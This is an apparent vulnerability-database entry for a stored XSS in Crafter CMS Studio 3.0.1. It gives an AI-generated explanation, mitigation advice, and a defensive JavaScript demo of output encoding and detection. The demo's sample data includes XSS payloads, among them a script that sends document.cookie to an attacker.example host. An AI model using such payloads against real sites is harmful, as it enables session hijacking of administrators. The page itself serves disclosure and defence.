CVE-2017-15682
Description
Crafter CMS Studio 3.0.1 allows unauthenticated stored XSS, letting attackers inject malicious JavaScript into the admin panel.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Crafter Studio 3.0.1 (Crafter CMS) contains a stored cross-site scripting (XSS) vulnerability reachable from the admin panel. An unauthenticated attacker can submit JavaScript that is persisted by the application and later executed in the browser session of an administrator who views it. The root cause is that user-supplied input is stored without validation and then rendered into admin pages without output encoding for the HTML context it lands in.
Exploitation
No authentication is required to initiate the attack. The attacker submits a crafted payload through a publicly accessible input field, the server stores it, and the script is rendered unmodified when an administrator views the affected area of the admin panel. Because the XSS is stored rather than reflected, the attacker does not see the response to the injection request; the payload fires later, when a privileged user loads the page, so it is typically used to send the administrator's session data or privileged requests to an attacker-controlled host rather than to return anything to the attacker directly.
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the security context of the admin panel. This can lead to theft of the administrator's session token (or, where cookies are HttpOnly, to authenticated requests issued silently from the administrator's browser), defacement of managed content, and actions performed on the admin's behalf. Because the script runs with the administrator's privileges, the attacker can effectively compromise the whole CMS instance.
Mitigation
As of the publication date (2020-11-27), no patch has been explicitly referenced in the advisory [1]. Note that the GitHub Security Advisory's package data listed below gives org.craftercms:crafter-core 3.0.1 as the patched version, while the CVE description names 3.0.1 as the affected release; verify the deployed version against the vendor advisory rather than relying on the version range alone. Administrators should review their Crafter CMS deployment, apply any available updates, and ensure that every user-supplied value shown in Studio is encoded for the HTML context in which it is rendered (input validation alone does not stop XSS, since a field may legitimately contain angle brackets or quotes). Marking session cookies HttpOnly and restricting network access to the admin panel reduce the impact and the exposure respectively.
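The rendering defect described in the Vulnerability and Exploitation sections, and the output-encoding fix recommended above, as an added example that is not Crafter CMS or Crafter Studio code. The stored records, the admin-listing template, the attacker.example host and all function names are constructed for this illustration; the tokeniser is a rough approximation of how a browser splits markup into tags, sufficient to show which tags and attributes came from stored data rather than from the template.

```javascript
// Added example (not Crafter CMS / Crafter Studio code): how a stored XSS in an
// admin listing arises from unencoded rendering, and the output-encoding fix.
// All records, names and the attacker.example host below are constructed.

// Constructed "stored" records, as if submitted through a public form and
// persisted without sanitization. The third record carries the payload.
const STORED_COMMENTS = [
  { author: "alice", body: "Looks good." },
  { author: "bob", body: 'Use "quotes" & <b>bold</b> carefully' },
  {
    author: '"><img src=x onerror=alert(document.cookie)>',
    body: "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>",
  },
];

// Encoder for the HTML text and double-quoted-attribute contexts used by the
// template below. Other contexts (URL, JavaScript, CSS) need their own encoders.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable rendering: stored strings concatenated straight into the markup
// the administrator's browser will parse.
function renderUnsafe(records) {
  return records
    .map((r) => `<tr data-author="${r.author}"><td>${r.author}</td><td>${r.body}</td></tr>`)
    .join("\n");
}

// Hardened rendering: the same template, with every stored value encoded for
// the context it lands in (attribute value or element text).
function renderSafe(records) {
  return records
    .map((r) => {
      const author = escapeHtml(r.author);
      return `<tr data-author="${author}"><td>${author}</td><td>${escapeHtml(r.body)}</td></tr>`;
    })
    .join("\n");
}

// Check that can be run over the rendered fragment (in a test or a review):
// split the markup into tags roughly the way a browser would and report any
// opening tag the template does not emit itself, plus any on* event-handler
// attribute. The template only emits <tr> and <td>, so anything else must have
// come from stored data.
const TAG_RE = /<(\/?)([a-z][a-z0-9-]*)\b([^>]*)>/gi;
const ATTR_RE = /([^\s=\/>]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;

function findUnexpectedMarkup(html, allowedTags = ["tr", "td"]) {
  const findings = new Set();
  for (const tag of html.matchAll(TAG_RE)) {
    const [, closing, rawName, rawAttrs] = tag;
    if (closing) continue; // closing tags carry no attributes
    const name = rawName.toLowerCase();
    if (!allowedTags.includes(name)) findings.add(`tag:${name}`);
    for (const attr of rawAttrs.matchAll(ATTR_RE)) {
      const attrName = attr[1].toLowerCase();
      if (attrName.startsWith("on")) findings.add(`attr:${attrName}`);
    }
  }
  return [...findings].sort();
}

// Defence in depth on the input side: bound the length and reject C0 control
// characters (tab, LF and CR stay allowed). It deliberately does not try to
// strip markup: the fix for XSS is encoding at the output, and a field may
// legitimately contain "<" or quotes.
function acceptInput(value, maxLength = 2000) {
  return typeof value === "string"
    && value.length <= maxLength
    && !/[\u0000-\u0008\u000B\u000C\u000E-\u001F\u007F]/.test(value);
}

console.log(findUnexpectedMarkup(renderUnsafe(STORED_COMMENTS)));
console.log(findUnexpectedMarkup(renderSafe(STORED_COMMENTS)));
```

Run under Node: the first line lists the tags and handler attributes smuggled in by the stored records (including the `<img onerror>` that breaks out of the `data-author` attribute and the `<script>` in the body), the second is empty because every `<`, `>` and quote from the data has been encoded. The same findUnexpectedMarkup check is a reasonable regression test to keep beside any template that interpolates stored content.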
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| org.craftercms:crafter-core | Maven | >= 3.0.0, < 3.0.1 | 3.0.1 |
Affected products
- Crafter CMS / Crafter Studio
Patches
No patches discovered yet.
Vulnerability mechanics
No source-code context for this CVE — mechanics is only generated when we can read the actual fix diff. Without that, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References
- [1] github.com/advisories/GHSA-38rq-rh9w-cmw6 (GHSA, advisory)
- [2] nvd.nist.gov/vuln/detail/CVE-2017-15682 (GHSA, advisory)
- [3] crafter.com (MITRE, x_refsource_MISC)
- [4] docs.craftercms.org/en/3.0/security/advisory.html (GHSA, x_refsource_MISC, web)
News mentions
No linked articles in our index yet.